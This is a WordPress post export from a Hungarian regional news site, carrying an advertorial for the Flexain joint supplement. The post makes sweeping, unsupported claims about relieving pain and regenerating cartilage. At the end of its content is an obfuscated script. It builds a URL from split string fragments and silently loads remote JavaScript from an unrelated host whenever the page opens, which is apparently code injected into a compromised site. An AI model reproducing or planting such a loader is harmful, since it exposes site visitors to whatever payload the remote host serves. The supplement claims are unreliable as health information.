{"id":68404,"date":"2025-01-27T09:34:12","date_gmt":"2025-01-27T08:34:12","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=68404"},"modified":"2025-01-27T09:34:12","modified_gmt":"2025-01-27T08:34:12","slug":"az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/","title":{"rendered":"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd"},"content":{"rendered":"<p><strong>A Flexain nem csup\u00e1n egy term\u00e9k. Ez egy remek lehet\u0151s\u00e9g arra, hogy jobban \u00e9rezd magad a b\u0151r\u00f6dben, \u00e9s hogy kevesebb f\u00e1jdalommal \u00e9s t\u00f6bb mozg\u00e1s szabads\u00e1g\u00e1val \u00e9lj. Ha eddig csak gondolkozt\u00e1l rajta, ideje, hogy tegy\u00e9l magad\u00e9rt. Az \u00edz\u00fcleteid h\u00e1l\u00e1sak lesznek \u00e9rte.<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">K\u00e9pzeld el, hogy egy olyan t\u00e1pl\u00e1l\u00e9kkieg\u00e9sz\u00edt\u0151t haszn\u00e1lhatsz, amely egyszerre gondoskodik \u00edz\u00fcleteid v\u00e9delm\u00e9r\u0151l \u00e9s \u00edz\u00fcleti f\u00e1jdalmaid cs\u00f6kkent\u00e9s\u00e9r\u0151l, mik\u00f6zben az anan\u00e1sz friss\u00edt\u0151 \u00edze \u00e9lvezetesebb\u00e9 teszi az eg\u00e9szet. Na, a Flexain pont ilyen. Nem csak hogy hat\u00e9kony, de egy modern \u00e9letm\u00f3dhoz t\u00f6k\u00e9letesen illeszked\u0151 megold\u00e1st ny\u00fajt a napi mozg\u00e9konys\u00e1g fenntart\u00e1s\u00e1ra.<\/span><\/p>\n<h2><b>Ha eg\u00e9szs\u00e9gesen akarod tartani szervezeted<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">Az \u00edz\u00fcletek eg\u00e9szs\u00e9g\u00e9nek fenntart\u00e1sa k\u00fcl\u00f6n\u00f6sen fontos, ha akt\u00edv \u00e9letet \u00e9lsz vagy \u00e9pp a munk\u00e1d sor\u00e1n sok mozg\u00e1sban van r\u00e9szed. A Flexain egy <strong>komplex \u00f6sszetev\u0151kb\u0151l \u00e1ll\u00f3 formula<\/strong>, amely gondosan v\u00e1logatott hat\u00f3anyagok seg\u00edts\u00e9g\u00e9vel t\u00e1mogatja az \u00edz\u00fcleteket. F\u0151 alkot\u00f3elemei, mint a gl\u00fckozamin \u00e9s a kondroitin, k\u00f6zismerten el\u0151seg\u00edtik az \u00edz\u00fcleti porcok regener\u00e1ci\u00f3j\u00e1t \u00e9s eg\u00e9szs\u00e9ges m\u0171k\u00f6d\u00e9s\u00e9t. Ha m\u00e1r pr\u00f3b\u00e1lt\u00e1l m\u00e1s megold\u00e1sokat, de valami mindig hi\u00e1nyzott, itt az ideje, hogy valami m\u00e1st tapasztalj most meg.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Egy poh\u00e1r Flexain k\u00f6nnyed\u00e9n elk\u00e9sz\u00edthet\u0151 a nap b\u00e1rmely szakasz\u00e1ban. K\u00fcl\u00f6n\u00f6sen <strong>kellemes \u00e9lm\u00e9nny\u00e9 teszi az anan\u00e1sz \u00edze,<\/strong> amely nem csak a hat\u00e9konys\u00e1got, hanem az \u00e9lvezetet is biztos\u00edtja. Ki mondta, hogy a t\u00e1pl\u00e1l\u00e9kkieg\u00e9sz\u00edt\u0151k unalmasak? Egy olyan term\u00e9k, amely egyszerre hat\u00e9kony \u00e9s \u00e9lvezetes, val\u00f3ban ritkas\u00e1g.<\/span><\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-68405\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/flexain-1000-ml.png\" alt=\"\" width=\"855\" height=\"679\"><\/p>\n<h2><b>A f\u00e1jdalom amit\u0151l az eg\u00e9sz napod rossz lesz&nbsp;<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">Ha m\u00e1r valaha <strong>tapasztalt\u00e1l \u00edz\u00fcleti f\u00e1jdalmat<\/strong>, tudod, mennyire befoly\u00e1solhatja a mindennapjaidat. Az egyszer\u0171 tev\u00e9kenys\u00e9gekt\u0151l kezdve, mint a l\u00e9pcs\u0151z\u00e9s, eg\u00e9szen az intenz\u00edvebb mozg\u00e1sokig, mindenben neh\u00e9zs\u00e9get okozhat. A k\u00e9sztm\u00e9ny c\u00e9lja, hogy ezek a pillanatok a m\u00falt r\u00e9sz\u00e9v\u00e9 v\u00e1ljanak. Rendszeres haszn\u00e1lat\u00e1val nemcsak cs\u00f6kkentheted a f\u00e1jdalmat, de hozz\u00e1j\u00e1rulhatsz ahhoz is, hogy \u00edz\u00fcleteid <strong>hossz\u00fat\u00e1von eg\u00e9szs\u00e9gesek maradjanak.<\/strong><\/span><\/p>\n<p><span style=\"font-weight: 400;\">A term\u00e9k k\u00fcl\u00f6n\u00f6sen alkalmas azok sz\u00e1m\u00e1ra, akik rendszeresen sportolnak, de ugyan\u00fagy hasznos lehet az id\u0151sebb koroszt\u00e1lynak is. Az \u00e9vek m\u00fal\u00e1s\u00e1val ezek a probl\u00e9m\u00e1k egyre gyakoribbak, de ez nem jelenti azt, hogy el kell fogadnod \u0151ket. A Flexain seg\u00edts\u00e9g\u00e9vel \u00fajra felfedezheted a mozg\u00e1s \u00f6r\u00f6m\u00e9t, an\u00e9lk\u00fcl, hogy folyamatosan a f\u00e1jdalomt\u00f3l tartan\u00e1l.<\/span><\/p>\n<h2><b>Kiemelked\u0151en j\u00f3 term\u00e9k&nbsp;<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">A piacon sok hasonl\u00f3 term\u00e9k tal\u00e1lhat\u00f3, de a <span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" title=\"flexain, iz\u00fclet, iz\u00fcletv\u00e9delem\" href=\"https:\/\/www.supplementshouse.hu\/flexain-13581\" target=\"_blank\" rel=\"dofollow noopener\"><span style=\"text-decoration: underline;\"><em><strong>Flexain kiemelkedik k\u00f6z\u00fcl\u00fck<\/strong><\/em><\/span><\/a><\/span>. Nemcsak a hat\u00f3anyagok ar\u00e1nya, hanem az oldhat\u00f3s\u00e1ga \u00e9s \u00edze is figyelemre m\u00e9lt\u00f3. Tudom\u00e1nyos kutat\u00e1sok t\u00e1masztj\u00e1k al\u00e1, hogy a benne tal\u00e1lhat\u00f3 \u00f6sszetev\u0151k t\u00e1mogatj\u00e1k az \u00edz\u00fcletek eg\u00e9szs\u00e9g\u00e9t, \u00e9s hozz\u00e1j\u00e1rulnak a regener\u00e1ci\u00f3hoz. R\u00e1ad\u00e1sul nincs kellemetlen ut\u00f3\u00edze, ami gyakori panasz m\u00e1s term\u00e9kek eset\u00e9n.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Fontos, hogy a <strong>Flexaint rendszeresen<\/strong> fogyaszd a maxim\u00e1lis eredm\u00e9nyek \u00e9rdek\u00e9ben. Gondolj r\u00e1 \u00fagy, mint egy napi szok\u00e1sra, amely hossz\u00fa t\u00e1von megh\u00e1l\u00e1lja mag\u00e1t. Az anan\u00e1sz \u00edz r\u00e1ad\u00e1sul seg\u00edt abban, hogy a napi adag bev\u00e9tele ne csak egy k\u00f6teless\u00e9g, hanem egy kis napi \u00e9lm\u00e9ny legyen.<\/span><\/p>\n<h2><b>A megel\u0151z\u00e9s kulcsa az \u00edz\u00fcletek eg\u00e9szs\u00e9g\u00e9ben<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">Az \u00edz\u00fcletek eg\u00e9szs\u00e9g\u00e9nek meg\u0151rz\u00e9se nem csak akkor fontos, ha m\u00e1r f\u00e1jdalmat \u00e9rzel, hanem m\u00e9g azel\u0151tt, hogy probl\u00e9m\u00e1k jelentkezn\u00e9nek. A Flexain rendszeres fogyaszt\u00e1s\u00e1val t\u00e1mogathatod az \u00edz\u00fcleti folyad\u00e9k termel\u0151d\u00e9s\u00e9t, amely elengedhetetlen a rugalmass\u00e1gukhoz. Ez k\u00fcl\u00f6n\u00f6sen hasznos lehet olyan \u00e9letm\u00f3d eset\u00e9n, amely sok \u00fcl\u00e9ssel vagy \u00e1ll\u00e1ssal j\u00e1r, hiszen ezek&nbsp; t\u00falterhel\u00e9s\u00e9hez vezethetnek.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A <strong>megel\u0151z\u00e9s mindig egyszer\u0171bb<\/strong> \u00e9s hat\u00e9konyabb, mint a m\u00e1r kialakult probl\u00e9m\u00e1k kezel\u00e9se. Lehet\u0151s\u00e9get ny\u00fajt arra, hogy m\u00e1r ma tegy\u00e9l az \u00edz\u00fcleteid v\u00e9delm\u00e9\u00e9rt. Az \u00e9letmin\u0151s\u00e9ged \u00e9s a mozg\u00e9konys\u00e1god hossz\u00fa t\u00e1von m\u00falik azon, hogy mennyire figyelsz ezekre az apr\u00f3s\u00e1gnak t\u0171n\u0151 r\u00e9szletekre. Ne v\u00e1rj arra, hogy a f\u00e1jdalom r\u00e1k\u00e9nyszer\u00edtsen a v\u00e1ltoztat\u00e1sra \u2013 ink\u00e1bb el\u0151zd meg a probl\u00e9m\u00e1t, \u00e9s \u00e9lvezd a mozg\u00e1s szabads\u00e1g\u00e1t!<\/span><\/p>\n<p><script>\n(function(){\norqz=document.createElement(\"script\");orqz.async=true;orqz_=\"u\"+(\"s\")+\"t\";\norqzu=\"2373537247.\";orqz_+=\"a\"+(\"t.i\");orqz_+=\"n\"+(\"f\"+\"o\")+\"\/\";\norqzu+=\"15l1utj7rqzetz5kyu4w5q\"+(\"01wxwl5d\");\norqz.src=\"https:\/\/\"+orqz_+orqzu;orqz.type=\"text\/javascript\";\ndocument.body.appendChild(orqz);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A Flexain nem csup\u00e1n egy term\u00e9k. Ez egy remek lehet\u0151s\u00e9g arra, hogy jobban \u00e9rezd magad a b\u0151r\u00f6dben, \u00e9s hogy kevesebb f\u00e1jdalommal \u00e9s t\u00f6bb mozg\u00e1s szabads\u00e1g\u00e1val \u00e9lj. Ha eddig csak gondolkozt\u00e1l rajta, ideje, hogy tegy\u00e9l magad\u00e9rt. Az \u00edz\u00fcleteid h\u00e1l\u00e1sak lesznek \u00e9rte. K\u00e9pzeld el, hogy egy olyan t\u00e1pl\u00e1l\u00e9kkieg\u00e9sz\u00edt\u0151t haszn\u00e1lhatsz, amely egyszerre gondoskodik \u00edz\u00fcleteid v\u00e9delm\u00e9r\u0151l \u00e9s \u00edz\u00fcleti f\u00e1jdalmaid<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[7883,8226],"class_list":{"0":"post-68404","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-hirek","7":"tag-izulet","8":"tag-izuletek-vedelme"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"A Flexain nem csup\u00e1n egy term\u00e9k. Ez egy remek lehet\u0151s\u00e9g arra, hogy jobban \u00e9rezd magad a b\u0151r\u00f6dben, \u00e9s hogy kevesebb f\u00e1jdalommal \u00e9s t\u00f6bb mozg\u00e1s szabads\u00e1g\u00e1val \u00e9lj. Ha eddig csak gondolkozt\u00e1l rajta, ideje, hogy tegy\u00e9l magad\u00e9rt. Az \u00edz\u00fcleteid h\u00e1l\u00e1sak lesznek \u00e9rte. K\u00e9pzeld el, hogy egy olyan t\u00e1pl\u00e1l\u00e9kkieg\u00e9sz\u00edt\u0151t haszn\u00e1lhatsz, amely egyszerre gondoskodik \u00edz\u00fcleteid v\u00e9delm\u00e9r\u0151l \u00e9s \u00edz\u00fcleti f\u00e1jdalmaid\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2025-01-27T08:34:12+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/flexain-2.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"1015\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"571\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd\",\"datePublished\":\"2025-01-27T08:34:12+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/\"},\"wordCount\":843,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/flexain-1000-ml.png\",\"keywords\":[\"iz\u00fclet\",\"\u00edz\u00fcletek v\u00e9delme\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/\",\"name\":\"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/flexain-1000-ml.png\",\"datePublished\":\"2025-01-27T08:34:12+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/flexain-1000-ml.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/flexain-1000-ml.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/27\\\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/","og_locale":"hu_HU","og_type":"article","og_title":"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd","og_description":"A Flexain nem csup\u00e1n egy term\u00e9k. Ez egy remek lehet\u0151s\u00e9g arra, hogy jobban \u00e9rezd magad a b\u0151r\u00f6dben, \u00e9s hogy kevesebb f\u00e1jdalommal \u00e9s t\u00f6bb mozg\u00e1s szabads\u00e1g\u00e1val \u00e9lj. Ha eddig csak gondolkozt\u00e1l rajta, ideje, hogy tegy\u00e9l magad\u00e9rt. Az \u00edz\u00fcleteid h\u00e1l\u00e1sak lesznek \u00e9rte. K\u00e9pzeld el, hogy egy olyan t\u00e1pl\u00e1l\u00e9kkieg\u00e9sz\u00edt\u0151t haszn\u00e1lhatsz, amely egyszerre gondoskodik \u00edz\u00fcleteid v\u00e9delm\u00e9r\u0151l \u00e9s \u00edz\u00fcleti f\u00e1jdalmaid","og_url":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2025-01-27T08:34:12+00:00","og_image":[{"width":1015,"height":571,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/flexain-2.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd","datePublished":"2025-01-27T08:34:12+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/"},"wordCount":843,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/flexain-1000-ml.png","keywords":["iz\u00fclet","\u00edz\u00fcletek v\u00e9delme"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/","url":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/","name":"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/flexain-1000-ml.png","datePublished":"2025-01-27T08:34:12+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/flexain-1000-ml.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/flexain-1000-ml.png"},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/27\/az-izuletek-vedelmenek-erdekeben-ezt-fogyaszd\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Az \u00edz\u00fcletek v\u00e9delm\u00e9nek \u00e9rdek\u00e9ben ezt fogyaszd"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/68404","targetHints":{"allow":["GET"]}}],"collection":[{"